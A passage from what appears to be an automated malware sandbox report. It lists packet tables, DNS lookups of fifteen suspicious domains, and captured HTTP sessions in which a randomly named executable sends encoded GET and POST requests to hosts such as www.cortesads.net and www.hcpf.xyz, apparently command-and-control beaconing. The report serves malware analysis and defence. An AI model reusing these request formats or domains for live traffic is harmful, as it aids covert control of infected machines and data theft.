                                                                                                                            Oct 19, 2024 12:59:55.409329891 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:55.414714098 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.417381048 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:55.429565907 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:55.434672117 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434681892 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434685946 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434967995 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434977055 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434986115 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.435122967 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.435131073 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.435141087 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:56.063960075 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:56.064034939 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:56.937186956 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:56.942414045 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:57.965708017 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:57.970762968 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:57.970880985 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:57.979615927 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:57.984481096 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617046118 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617074013 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617085934 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617219925 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.617948055 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617990017 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.618014097 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618024111 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618032932 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618041992 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618053913 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618060112 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.618067026 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618086100 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.618102074 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.623495102 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.623691082 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.623749971 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.646066904 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.646177053 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.647073984 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.653546095 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:03.705526114 CEST5005680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:03.710329056 CEST80500563.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:03.711226940 CEST5005680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:03.721625090 CEST5005680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:03.726430893 CEST80500563.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:04.340150118 CEST80500563.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:04.340209961 CEST5005680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:05.235162020 CEST5005680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:05.240119934 CEST80500563.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:06.252660036 CEST5005780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:06.925771952 CEST80500573.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:06.927247047 CEST5005780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:06.939129114 CEST5005780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:06.943954945 CEST80500573.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:07.580261946 CEST80500573.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:07.583241940 CEST5005780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:08.451664925 CEST5005780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:08.456691027 CEST80500573.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.473176003 CEST5005880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:09.478195906 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.479245901 CEST5005880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:09.557213068 CEST5005880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:09.565088034 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.565103054 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.565112114 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.565135956 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.565150976 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.565160036 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.565170050 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.565187931 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:09.565196991 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:10.114933014 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:10.114990950 CEST5005880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:11.061148882 CEST5005880192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:11.066517115 CEST80500583.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:12.686726093 CEST5005980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:12.692002058 CEST80500593.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:12.692075968 CEST5005980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:12.732429981 CEST5005980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:12.737533092 CEST80500593.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:13.328516960 CEST80500593.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:13.330416918 CEST80500593.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:13.330521107 CEST5005980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:13.331279039 CEST5005980192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 13:00:13.338021994 CEST80500593.33.130.190192.168.2.4

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Oct 19, 2024 12:57:03.309730053 CEST5781353192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:57:03.323249102 CEST53578131.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:19.050085068 CEST5235253192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:57:19.073851109 CEST53523521.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:32.637507915 CEST6031853192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:57:32.898922920 CEST53603181.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:46.174233913 CEST6240953192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:57:46.198400021 CEST53624091.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:59.628591061 CEST5817353192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:57:59.641696930 CEST53581731.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:12.955738068 CEST5163453192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:58:13.963372946 CEST53516341.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:27.800097942 CEST6538953192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:58:27.864289999 CEST53653891.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:41.159363985 CEST5770953192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:58:41.285960913 CEST53577091.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:54.643404961 CEST6227253192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:58:54.653208017 CEST53622721.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:07.943152905 CEST6282053192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:59:07.957706928 CEST53628201.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:21.284112930 CEST5555953192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:59:21.298857927 CEST53555591.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:34.659096956 CEST5127953192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:59:35.632275105 CEST53512791.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:49.879252911 CEST6527853192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 12:59:50.276345968 CEST53652781.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:03.658368111 CEST5124953192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 13:00:03.699784040 CEST53512491.1.1.1192.168.2.4
                                                                                                                            Oct 19, 2024 13:00:18.814857960 CEST5568653192.168.2.41.1.1.1
                                                                                                                            Oct 19, 2024 13:00:19.789316893 CEST53556861.1.1.1192.168.2.4

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Oct 19, 2024 12:57:03.309730053 CEST192.168.2.41.1.1.10xd0f2Standard query (0)www.cortesads.netA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:19.050085068 CEST192.168.2.41.1.1.10xc0fStandard query (0)www.hcpf.xyzA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:32.637507915 CEST192.168.2.41.1.1.10x9fe2Standard query (0)www.kerennih31.clickA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:46.174233913 CEST192.168.2.41.1.1.10x2eb1Standard query (0)www.setsea.infoA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:59.628591061 CEST192.168.2.41.1.1.10xdfc8Standard query (0)www.cablecarrental.netA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:12.955738068 CEST192.168.2.41.1.1.10xaf47Standard query (0)www.cqghwamc.topA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:27.800097942 CEST192.168.2.41.1.1.10x8b46Standard query (0)www.662-home-nb.shopA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:41.159363985 CEST192.168.2.41.1.1.10xcf3cStandard query (0)www.stopgazviganais.orgA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:54.643404961 CEST192.168.2.41.1.1.10xff45Standard query (0)www.whiterabbitgroup.proA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:07.943152905 CEST192.168.2.41.1.1.10xe724Standard query (0)www.bidiez.comA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:21.284112930 CEST192.168.2.41.1.1.10xf529Standard query (0)www.deltastem.netA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:34.659096956 CEST192.168.2.41.1.1.10x3d9aStandard query (0)www.dxfwrc2h.sbsA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:49.879252911 CEST192.168.2.41.1.1.10xa982Standard query (0)www.rsantos.shopA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 13:00:03.658368111 CEST192.168.2.41.1.1.10x1b3eStandard query (0)www.jsninja.netA (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 13:00:18.814857960 CEST192.168.2.41.1.1.10x893fStandard query (0)www.everyone.golfA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Oct 19, 2024 12:57:03.323249102 CEST1.1.1.1192.168.2.40xd0f2No error (0)www.cortesads.netcortesads.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:03.323249102 CEST1.1.1.1192.168.2.40xd0f2No error (0)cortesads.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:03.323249102 CEST1.1.1.1192.168.2.40xd0f2No error (0)cortesads.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:19.073851109 CEST1.1.1.1192.168.2.40xc0fNo error (0)www.hcpf.xyz172.67.181.186A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:19.073851109 CEST1.1.1.1192.168.2.40xc0fNo error (0)www.hcpf.xyz104.21.48.76A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:32.898922920 CEST1.1.1.1192.168.2.40x9fe2No error (0)www.kerennih31.clickkerennih31.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:32.898922920 CEST1.1.1.1192.168.2.40x9fe2No error (0)kerennih31.click104.223.44.195A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:46.198400021 CEST1.1.1.1192.168.2.40x2eb1No error (0)www.setsea.info203.161.41.204A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:59.641696930 CEST1.1.1.1192.168.2.40xdfc8No error (0)www.cablecarrental.netcablecarrental.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:59.641696930 CEST1.1.1.1192.168.2.40xdfc8No error (0)cablecarrental.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:57:59.641696930 CEST1.1.1.1192.168.2.40xdfc8No error (0)cablecarrental.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:13.963372946 CEST1.1.1.1192.168.2.40xaf47No error (0)www.cqghwamc.top221.128.225.57A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:27.864289999 CEST1.1.1.1192.168.2.40x8b46No error (0)www.662-home-nb.shop199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:41.285960913 CEST1.1.1.1192.168.2.40xcf3cNo error (0)www.stopgazviganais.org172.67.196.90A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:41.285960913 CEST1.1.1.1192.168.2.40xcf3cNo error (0)www.stopgazviganais.org104.21.12.211A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:54.653208017 CEST1.1.1.1192.168.2.40xff45No error (0)www.whiterabbitgroup.prowhiterabbitgroup.proCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:54.653208017 CEST1.1.1.1192.168.2.40xff45No error (0)whiterabbitgroup.pro3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:58:54.653208017 CEST1.1.1.1192.168.2.40xff45No error (0)whiterabbitgroup.pro15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:07.957706928 CEST1.1.1.1192.168.2.40xe724No error (0)www.bidiez.combidiez.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:07.957706928 CEST1.1.1.1192.168.2.40xe724No error (0)bidiez.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:07.957706928 CEST1.1.1.1192.168.2.40xe724No error (0)bidiez.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:21.298857927 CEST1.1.1.1192.168.2.40xf529No error (0)www.deltastem.netdeltastem.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:21.298857927 CEST1.1.1.1192.168.2.40xf529No error (0)deltastem.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:21.298857927 CEST1.1.1.1192.168.2.40xf529No error (0)deltastem.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:35.632275105 CEST1.1.1.1192.168.2.40x3d9aNo error (0)www.dxfwrc2h.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:35.632275105 CEST1.1.1.1192.168.2.40x3d9aNo error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:35.632275105 CEST1.1.1.1192.168.2.40x3d9aNo error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:35.632275105 CEST1.1.1.1192.168.2.40x3d9aNo error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:35.632275105 CEST1.1.1.1192.168.2.40x3d9aNo error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:35.632275105 CEST1.1.1.1192.168.2.40x3d9aNo error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:35.632275105 CEST1.1.1.1192.168.2.40x3d9aNo error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:35.632275105 CEST1.1.1.1192.168.2.40x3d9aNo error (0)b1-3-r111.kunlundns.top129.226.56.200A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:50.276345968 CEST1.1.1.1192.168.2.40xa982No error (0)www.rsantos.shoprsantos.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 12:59:50.276345968 CEST1.1.1.1192.168.2.40xa982No error (0)rsantos.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 13:00:03.699784040 CEST1.1.1.1192.168.2.40x1b3eNo error (0)www.jsninja.netjsninja.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 13:00:03.699784040 CEST1.1.1.1192.168.2.40x1b3eNo error (0)jsninja.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 13:00:03.699784040 CEST1.1.1.1192.168.2.40x1b3eNo error (0)jsninja.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 13:00:19.789316893 CEST1.1.1.1192.168.2.40x893fNo error (0)www.everyone.golfeveryone.golfCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Oct 19, 2024 13:00:19.789316893 CEST1.1.1.1192.168.2.40x893fNo error (0)everyone.golf3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                            Oct 19, 2024 13:00:19.789316893 CEST1.1.1.1192.168.2.40x893fNo error (0)everyone.golf15.197.148.33A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • www.cortesads.net
                                                                                                                            • www.hcpf.xyz
                                                                                                                            • www.kerennih31.click
                                                                                                                            • www.setsea.info
                                                                                                                            • www.cablecarrental.net
                                                                                                                            • www.cqghwamc.top
                                                                                                                            • www.662-home-nb.shop
                                                                                                                            • www.stopgazviganais.org
                                                                                                                            • www.whiterabbitgroup.pro
                                                                                                                            • www.bidiez.com
                                                                                                                            • www.deltastem.net
                                                                                                                            • www.dxfwrc2h.sbs
                                                                                                                            • www.rsantos.shop
                                                                                                                            • www.jsninja.net

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.4497623.33.130.190803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:03.347311974 CEST596OUTGET /lpx9/?2BWDG=yfrMmnVL9edufzkkV67gQCynHe5+gBIRO00DGxhyT3HPHFaar1P6nPddxxsQoEWGQjZ/tmjPotgApkkCYtaEOgx0Q//NLra/l6H2B8DThfTi+Y2WyOSOvVY=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.cortesads.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:57:04.000720978 CEST394INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:03 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 42 57 44 47 3d 79 66 72 4d 6d 6e 56 4c 39 65 64 75 66 7a 6b 6b 56 36 37 67 51 43 79 6e 48 65 35 2b 67 42 49 52 4f 30 30 44 47 78 68 79 54 33 48 50 48 46 61 61 72 31 50 36 6e 50 64 64 78 78 73 51 6f 45 57 47 51 6a 5a 2f 74 6d 6a 50 6f 74 67 41 70 6b 6b 43 59 74 61 45 4f 67 78 30 51 2f 2f 4e 4c 72 61 2f 6c 36 48 32 42 38 44 54 68 66 54 69 2b 59 32 57 79 4f 53 4f 76 56 59 3d 26 77 66 6d 3d 47 36 6f 54 6f 38 76 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2BWDG=yfrMmnVL9edufzkkV67gQCynHe5+gBIRO00DGxhyT3HPHFaar1P6nPddxxsQoEWGQjZ/tmjPotgApkkCYtaEOgx0Q//NLra/l6H2B8DThfTi+Y2WyOSOvVY=&wfm=G6oTo8vx"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.449843172.67.181.186803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:57:19.093046904 CEST851OUTPOST /uy9i/ HTTP/1.1
                                                                                                                            Host: www.hcpf.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.hcpf.xyz
                                                                                                                            Referer: http://www.hcpf.xyz/uy9i/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 4e 35 67 6e 38 51 73 30 37 7a 6e 73 6b 70 4d 4d 68 37 4d 4d 53 4b 61 35 35 34 74 35 56 31 39 45 44 46 7a 79 32 58 57 4a 5a 62 64 2b 69 41 6b 73 41 72 79 61 6b 30 72 44 6e 44 6a 78 47 77 49 72 56 75 31 6e 45 59 6b 46 6b 41 2f 61 39 63 42 31 55 33 4d 61 4e 79 2f 6c 72 69 7a 45 34 65 35 31 4e 71 58 56 78 57 34 4f 6c 73 36 34 74 32 38 33 55 56 4d 43 46 48 34 30 61 52 62 31 49 38 71 69 75 4e 34 51 30 30 65 73 6e 32 44 2f 38 6e 7a 48 57 33 55 72 79 51 6f 78 32 34 72 4e 35 67 78 45 37 41 33 2f 31 79 52 62 7a 45 38 52 55 57 6b 68 30 76 49 33 43 31 38 35 79 55 70 36 58 75 75 55 59 67 3d 3d
                                                                                                                            Data Ascii: 2BWDG=N5gn8Qs07znskpMMh7MMSKa554t5V19EDFzy2XWJZbd+iAksAryak0rDnDjxGwIrVu1nEYkFkA/a9cB1U3MaNy/lrizE4e51NqXVxW4Ols64t283UVMCFH40aRb1I8qiuN4Q00esn2D/8nzHW3UryQox24rN5gxE7A3/1yRbzE8RUWkh0vI3C185yUp6XuuUYg==
                                                                                                                            Oct 19, 2024 12:57:19.980660915 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:19 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHB3N0phCtXpx3kUmVrWpZAbollU%2Fd5%2BaA9gAXg8iDaqNLVeXe16bRRvxFTw%2FQ5ar%2BWJqWBmUEfn49rsKG1lZFGpGgxswoGsr%2BRU%2FrdOFX%2FTw3bYwuFcEXM4Vm8EuGQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8d503f21accf4755-DFW
                                                                                                                            Content-Encoding: gzip
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=851&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
